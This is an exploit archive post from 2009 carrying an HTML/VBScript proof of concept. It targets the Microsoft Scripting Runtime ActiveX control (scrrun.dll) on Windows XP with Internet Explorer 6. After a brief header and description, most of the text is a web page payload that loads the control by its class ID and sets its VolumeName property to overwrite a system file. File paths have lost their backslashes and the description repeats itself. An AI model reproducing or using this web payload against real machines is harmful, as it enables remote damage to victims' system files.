mssr-overwrite.txt
Posted on 23 August 2009
?<!-- MS Scripting Runtime ActiveX (scrrun.dll) Remote File Overwrite Exploit ############################################################ ## Pentesters Security Researching Group ## ## Www.Pentesters.iR ## ## PLATEN " H.jafari " ## ## ## ## E-mail and blog: ## ## ## ## platen.gigfa.com ## ## platen.secure[at]gmail[dot] com ## ## ## ## Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake ## ## and all members in Pentesters.ir ## ############################################################ Description: scrrun.dll contains libraries for reading and writing scripts and text files. vendor site: www.Microsoft.com Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6 Details ******* This control contains two methods Property Let VolumeName As String() that can be used to owervrite any file on OS Property Let VolumeName As String --> <html> <object classid='clsid:C7C3F5B1-88A3-11D0-ABCB-00A0C90FFFC0' id='target' /> <script language='vbscript'> targetFile = "C:WINDOWSsystem32scrrun.dll" prototype = "Property Let VolumeName As String" memberName = "VolumeName" progid = "Scripting.Drive" argCount = 1 arg1="c:windowssystem_.ini" target.VolumeName = arg1 </script> <html>
